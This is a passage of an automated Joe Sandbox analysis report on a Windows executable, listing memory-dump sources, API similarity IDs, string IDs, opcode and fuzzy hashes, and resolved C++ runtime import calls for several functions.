                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: freemalloc$memcpy
                                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                                      • API String ID: 3519880569-1684325040
                                                                                                                                                                                                      • Opcode ID: 0eda81c0c239a8611bac5c0baf279c831adc2644f40de38efdfea289433fc128
                                                                                                                                                                                                      • Instruction ID: c79df0c079333859e69e1cd6b387bccd35e93e9db4c64e75ff5b729c387842f6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0eda81c0c239a8611bac5c0baf279c831adc2644f40de38efdfea289433fc128
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE714A32A05B81C6EB558F25D59127873A4FF58F44F099239CF8D8766AEF38E4A9C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fclose$fseek$freadfreeftellmalloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3246642831-0
                                                                                                                                                                                                      • Opcode ID: ff4f35db017b39ea0c5163d7132d8126960ede29f49af772f42db7f08a07c73e
                                                                                                                                                                                                      • Instruction ID: 6ee105dde4d568fc8cb3b645a509d98bd350717cf9e4a4f02351a4fd46aac2de
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff4f35db017b39ea0c5163d7132d8126960ede29f49af772f42db7f08a07c73e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC313C21B89A46C1FA558B16A85623922A0FF4DF91F5C6038DD5E837B9EF3CE446C780
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                      • Opcode ID: 8b64c2be8278b95c9aac7489ece65f10063ef43e940052f4b2b06cd90fb21b61
                                                                                                                                                                                                      • Instruction ID: 960e800a9aea73da4b180de271164f6a634ba3badb0eca2115650e23524dd861
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b64c2be8278b95c9aac7489ece65f10063ef43e940052f4b2b06cd90fb21b61
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15510436A0AB85C6EB558F61E59122833A4FF48F44F184939CE8D87779EF38E894C750
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fgetc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2807381905-0
                                                                                                                                                                                                      • Opcode ID: 8e3bcec6f41877c3f3658ed6ff0d8a0ed4f6fdf14b624ecb2e1fb391573904be
                                                                                                                                                                                                      • Instruction ID: f7725d74a54d3eae0ea2823a6eadc1f1b65abc8f2a509af48d9a81b777ee6d16
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e3bcec6f41877c3f3658ed6ff0d8a0ed4f6fdf14b624ecb2e1fb391573904be
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4917E32B14A41D9EB508F65C4A13AC3BB4FB48B68F54563ADA5D93BA8DF38D498C340
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memchr$freemallocmemcpy
                                                                                                                                                                                                      • String ID: Window$]
                                                                                                                                                                                                      • API String ID: 96147131-2892678728
                                                                                                                                                                                                      • Opcode ID: 53901d8bd3373084383248c6a7a434a551332a9d99a70775425c7eeec431fad4
                                                                                                                                                                                                      • Instruction ID: 22cf4ad5d4f54ddee01a17d311ce90f11110a52ae00a0bbe64a4ec9eabab7088
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53901d8bd3373084383248c6a7a434a551332a9d99a70775425c7eeec431fad4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32510021B09696C1EB608B1696262BDA791BF4DFE0F484139DE4D877BDDE3CE542C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                      • Opcode ID: 43d9a7e637991d804413b75b8eafd0b546bee4898880e55e751b3496ef96445f
                                                                                                                                                                                                      • Instruction ID: 684285ba944a41fd142d76405ae31e5612554e41de048e6523e71f9dc72a6176
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43d9a7e637991d804413b75b8eafd0b546bee4898880e55e751b3496ef96445f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0851C332A08B81E2EA119F25D1562692360FF18F84F14463ACF6D477A6DF38E1D9C340
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8A33
                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8A86
                                                                                                                                                                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8AAF
                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8AD6
                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8B1C
                                                                                                                                                                                                      • ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8B23
                                                                                                                                                                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8B30
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 729925803-0
                                                                                                                                                                                                      • Opcode ID: bcd7a0f69934c32e715cd8f22c3f0a5db7b8064309c69dbff390123b340a6c76
                                                                                                                                                                                                      • Instruction ID: 519bb63c900fb01522268d7fd094427c125fa9a31c1913ee0dfc4bb29199492e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcd7a0f69934c32e715cd8f22c3f0a5db7b8064309c69dbff390123b340a6c76
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B511132609A41C2EB218F19D5A5239A7A0FF89F95F158639CE5E837B5CF3ED44AC304
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C90DD
                                                                                                                                                                                                      • ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C90F7
                                                                                                                                                                                                      • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C9129
                                                                                                                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C9154
                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00007FF68B4C916D
                                                                                                                                                                                                      • ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C918C
                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C91B7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 762505753-0
                                                                                                                                                                                                      • Opcode ID: 380a719c7125fa9cec063be90638e52c4b12c2ba82d0ad67ce124ff0566ef5a0
                                                                                                                                                                                                      • Instruction ID: df2d71b7d88b56a2beaaa428c11accc733aee4bf07affcd6240489400c1a1d43
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 380a719c7125fa9cec063be90638e52c4b12c2ba82d0ad67ce124ff0566ef5a0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0316B26A08B41D5EA249F11E86617A7360FF8CF94F481639DA9E877B9CF3CE449C700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskmemset$ControlDevice_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4066468686-0
                                                                                                                                                                                                      • Opcode ID: af9a489837f2c71f30590f03e3bef5aad726f8ca5ea4237b30f63f64981b9537
                                                                                                                                                                                                      • Instruction ID: 7df21e5516ef85ecd0859ce1991b8da5223d5ffa1d6a0b73c80a92f4127c83fe
                                                                                                                                                                                                      • Opcode Fuzzy Hash: af9a489837f2c71f30590f03e3bef5aad726f8ca5ea4237b30f63f64981b9537
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF719232A09A85C5EA51DB15E415379A3A0FF88FA0F144739DAAD83BE9DF7CD045C700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: strstr
                                                                                                                                                                                                      • String ID: ###$Collapsed=%d$Pos=%d,%d$Size=%d,%d$[%s][%s]
                                                                                                                                                                                                      • API String ID: 1392478783-2972057365
                                                                                                                                                                                                      • Opcode ID: 1e491f211d45ecd41bcd29b71414cce088908a3ffd1bf8d7c3fc79f173c12dcf
                                                                                                                                                                                                      • Instruction ID: 7ef150a46fecb79f358ff7e2fd9e711c085594b669b24a8dee66cbcb5f748a94
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e491f211d45ecd41bcd29b71414cce088908a3ffd1bf8d7c3fc79f173c12dcf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA519C32A18A86C6EB25CF16E54247CB7A1FF89B84B458139DA9D87378DF3CE441CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                      • Opcode ID: 40054f43d045c37fcbcef3706d50dcf0714f2efa37c64624a9c12d944b83fd43
                                                                                                                                                                                                      • Instruction ID: da12e538652a72a66666429b93f4c54e153b450f0a0e60589f3036dfa8073bd0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40054f43d045c37fcbcef3706d50dcf0714f2efa37c64624a9c12d944b83fd43
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B41D362B08A86D1EF119B16A4263B96361BF0CFD4F544639DE5E477AEDE3CD089C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4C9FEA
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4C9FF9
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4CA02D
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4CA034
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4CA043
                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4CA06E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                      • Opcode ID: d4f941dda970df48a80948f096ff7b88bac27f3b7b00befcdb4b4898cb3aa907
                                                                                                                                                                                                      • Instruction ID: 3015eb567a07d87db35af7f47fae814fb77cf7aa6386ca5ef66cd1b06246fceb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4f941dda970df48a80948f096ff7b88bac27f3b7b00befcdb4b4898cb3aa907
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A241CD62B09B41D0EE109B56A0262A86351BF0CFD4F54463ADE5E877EDDE7CE089C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpymemset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3189120677-0
                                                                                                                                                                                                      • Opcode ID: 65660b5ec0a92b92cb17102d7c1e6591ca514627e9a4e19134e3ef0754e25239
                                                                                                                                                                                                      • Instruction ID: 5e07c315febfd3e4e04e16e361bb55291f6c9715801753130732cedaba13a2f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65660b5ec0a92b92cb17102d7c1e6591ca514627e9a4e19134e3ef0754e25239
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A941F362B1AA81D1EE11DB26A4122A96351FF48FD4F544239DF9D87BADDE3CD049C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B2701), ref: 00007FF68B4C787C
